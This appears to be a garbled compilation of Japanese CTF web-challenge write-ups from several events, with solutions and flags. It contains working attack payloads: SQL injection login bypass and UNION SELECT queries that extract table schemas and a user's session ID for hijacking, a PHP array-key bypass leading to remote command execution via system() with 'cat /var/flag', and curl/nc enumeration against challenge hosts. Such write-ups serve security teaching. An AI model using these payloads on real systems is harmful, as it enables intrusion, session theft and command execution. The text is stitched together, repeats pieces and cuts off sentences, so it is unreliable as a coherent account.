Not Another SQLi Challenge
283
Difficulty: easy
URLにアクセスすると次のページが表示されます。SQLインジェクションを試してみます。
NetIDに「admin」、Passwordに「' or 1=1#」と入力してLoginすると、下図のようにフラグが表示されます。
フラグは、
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}です。
Difficulty: easy
gigem{f4rm3r5_f4rm3r5_w3'r3_4ll_r16h7}です。
Web - 100 points
for i in `seq 1 1000`doout=`curl 138.247.13.110/todolist/$i/`if [ "`echo $out | grep MCA{`" ]; then break; fidoneecho $out
<!DOCTYPE html> <html lang="en"> <head> <!-- Basic Page Needs –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta charset="utf-8"> <title>Todolist</title> <meta name="description" content="Small todolist app."> <meta name="author" content="Christian Rotzoll"> <!-- Mobile Specific Metas –––––––––––––––––––––––––––––––––––––––––––––––––– --> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <!-- FONT –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link href='http://fonts.googleapis.com/css?family=Raleway:400,300,600' rel='stylesheet' type='text/css'> <!-- CSS –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/normalize/3.0.2/normalize.min.css"> <link rel="stylesheet" type='text/css' href="https://cdnjs.cloudflare.com/ajax/libs/skeleton/2.0.4/skeleton.min.css"> <link rel="stylesheet" type='text/css' href="/static/css/custom.css"> <!-- Scripts –––––––––––––––––––––––––––––––––––––––––––––––––– --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script> <script type="text/javascript" src="/static/js/site.js"></script> <script src="http://cdnjs.cloudflare.com/ajax/libs/moment.js/2.9.0/moment.min.js"></script> <script src="/static/lists/js/lists.js"></script> <!-- Favicon –––––––––––––––––––––––––––––––––––––––––––––––––– --> <link rel="icon" type="image/png" href="/static/images/favicon.png" /> </head> <body> <!-- Primary Page Layout –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="container"> <!-- Navigation –––––––––––––––––––––––––––––––––––––––––––––––––– --> <div class="navbar-spacer"></div> <nav class="navbar"> <div class="container"> <ul class="navbar-list"> <li class="navbar-item"><a class="navbar-link" href="/">Todolist</a></li> <li class="navbar-item"></li> </ul> </div> </nav> <section class="header"> <div class="row"> <div class="three columns value-prop"></div> <div class="six columns"> <div class="title">By MITRECTF:</div> <form action="/todo/add/678/" method=post> <input type='hidden' name='csrfmiddlewaretoken' value='0rG0HOuNVMinZEZvzuh0ONCZ1ExYstCr1bcbeEVMcSvYOxfxITknt7T0Krwykcn7' /> <tr><th></th><td><input type="text" name="description" class="u-full-width" id="id_description" placeholder="Enter your todo" required maxlength="128" /></td></tr> <input type="submit" value="Submit"> </form> </div> <div class="row"> <div class="one-half column open-todos"> <h6 class="docs-header open-todos">1 open</h6> <ul> <li><input type="checkbox" id="checkbox" data-todo-id="678"> MCA{al3x4_5et_a_r3minder}</li> </ul> </div> <div class="one-half column finished-todos"> <h6 class="docs-header finished-todos">0 finished</h6> <ul> </ul> </div> </div> </div> </section> </div> <!-- End Document –––––––––––––––––––––––––––––––––––––––––––––––––– --> </body> </html>
です。MCA{al3x4_5et_a_r3minder}
Maria is the only person who can view the flag
X-Forwarded-Forとは、HTTPヘッダフィールドの1つであり、ロードバランサなどの機器を経由してWebサーバに接続するクライアントの送信元IPアドレスを特定する際のデファクトスタンダードです。
2つのテーブル名が取得できました。' union select 1, 2, 3, group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'--
PHPSESSID=nxf8_users%2Cnxf8_sessions;
次のようにCREATE TABLE文を取得できました。' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_users'--
PHPSESSID=CREATE+TABLE+%22nxf8_users%22+%28%0A++++++++++++%22id%22+int%2810%29+NOT+NULL%2C%0A++++++++++++%22name%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22email%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22password%22+varchar%28255%29++NOT+NULL%2C%0A++++++++++++%22role%22+varchar%28100%29++DEFAULT+NULL%0A++++++++%29;
CREATE TABLE "nxf8_users" ("id" int(10) NOT NULL,"name" varchar(255) NOT NULL,"email" varchar(255) NOT NULL,"password" varchar(255) NOT NULL,"role" varchar(100) DEFAULT NULL);
' union select 1, 2, 3, sql FROM sqlite_master WHERE type='table' and tbl_name = 'nxf8_sessions'--
CREATE TABLE "nxf8_sessions" ("id" int(10) NOT NULL,"user_id" varchar(255) NOT NULL,"ip_address" varchar(255) NOT NULL,"session_id" varchar(255) NOT NULL);
' union select 1, 2, 3, id FROM nxf8_users where name = 'Maria'--
PHPSESSID=5;
' union select 1, 2, 3, session_id FROM nxf8_sessions where user_id = '5'--
PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
Cookie: PHPSESSID=fd2030b53fc9a4f01e6dbe551db7ded390461968;
aj9dhAdf4
not pretty much many options. No need to open a link from a browser, there is always a different way
<!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])-->
<script><!--var _0x7f88=["","join","reverse","split","log","ceab068d9522dc567177de8009f323b2"];function reverse(_0xa6e5x2){flag= _0xa6e5x2[_0x7f88[3]](_0x7f88[0])[_0x7f88[2]]()[_0x7f88[1]](_0x7f88[0])}console[_0x7f88[4]]= reverse;console[_0x7f88[4]](_0x7f88[5])--></script>
2b323f9008ed771765cd2259d860baec
Web - 50 points
It took a lot of courage but our great team accomplished the unthinkable. We are happy to announce a fantastic new express checkout experience. Our customers are going to love it! This new workflow has your items delivered to someone else in no time flat!
MCA{aCzb163wL9}です。
Web - 100 points
We see you’re running an ad-blocker. To view this content consider opening yourself up to malware. You can also subscribe for $9.99/month and still receive ads!
MCA{Ads_Supp0rt_webSit3z_MON$Y}
Beautify php code! Here
まず、POSTでパラメータbを配列の形で’admin’と’oloco’の2つ送信する必要がありますが、0番目が’admin’ではダメなので、PHPのバグを利用して次のように送信してみます。2^32=4294967296です。これは配列での比較(===)では一致(True)となりますが、配列の0番目の要素にアクセスすると初期化されていないことになります。<?phpinclude('oshit.php');$g_s = ['admin','oloco'];$__ni = $_POST['b'];$_p = 1;if(isset($_GET['source'])){highlight_file(__FILE__);exit;}if($__ni === $g_s & $__ni[0] != 'admin'){$__dgi = $_GET['x'];$__dfi = $_GET;foreach($__dfi as $_k_o => $_v){if($_k_o == $k_Jk){$f = 1;}if($f && strlen($__dgi)>17 && $_p == 3){$k_Jk($_v,$_k_o); //my shell :)}$_p++;}}else{echo "noob!";}
b[4294967296]=admin&b[1]=olocoFiddlerで[Replay]-[Reissue and Edit]を使用して、次にようにリクエストを送信します。
?x=123456789012345678&0=0&ls=systemFiddlerで次のようにリクエストを送信してみます。
?x=123456789012345678&0=0&ls%09/var=systemすると次のように結果が返ってきました。
backupscacheflagliblocallocklogoptrunspooltmpwww
フラグが表示されました。?x=123456789012345678&0=0&cat%09/var/flag=system
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}フラグは、
ASIS{f52c5a0cf980887bdac6ccaebac0e8428bfb8b83}です。
var net = require('net');flag='fake_flag';var server = net.createServer(function(socket) {socket.on('data', (data) => {//m = data.toString().replace(/[\n\r]*$/, '');ok = true;arr = data.toString().split(' ');arr = arr.map(Number);if (arr.length != 5)ok = false;arr1 = arr.slice(0);arr1.sort();for (var i=0; i<4; i++)if (arr1[i+1] == arr1[i] || arr[i] < 0 || arr1[i+1] > 127)ok = false;arr2 = []for (var i=0; i<4; i++)arr2.push(arr1[i] + arr1[i+1]);val = 0;for (var i=0; i<4; i++)val = val * 0x100 + arr2[i];if (val != 0x23332333)ok = false;if (ok)socket.write(flag+'\n');elsesocket.write('nope\n');});//socket.write('Echo server\r\n');//socket.pipe(socket);});HOST = '0.0.0.0'PORT = 23333server.listen(PORT, HOST);
$ nc 47.75.4.252 2333315 20 31 4 47*ctf{web_chal_made_by_binary_players_lol}
*ctf{web_chal_made_by_binary_players_lol}
問題に提示されているURLを表示します。Warm Up
150
When warmup becomes magical, security disintegrates.
inctf{Y0u_C4n_N3v3r_F1nd_7h1s_Fl4g}です。
提示されたWebサイトを表示します。サイト内のリンクをクリックすると下図のようなURLになっています。パラメータでページを切り替えているようです。Bon Appétit (100) - 73 solves
We are creating a new web-site for our restaurant. Can you check if it is secure enough?
flag{82d8173445ea865974fc0569c5c7cf7f}です。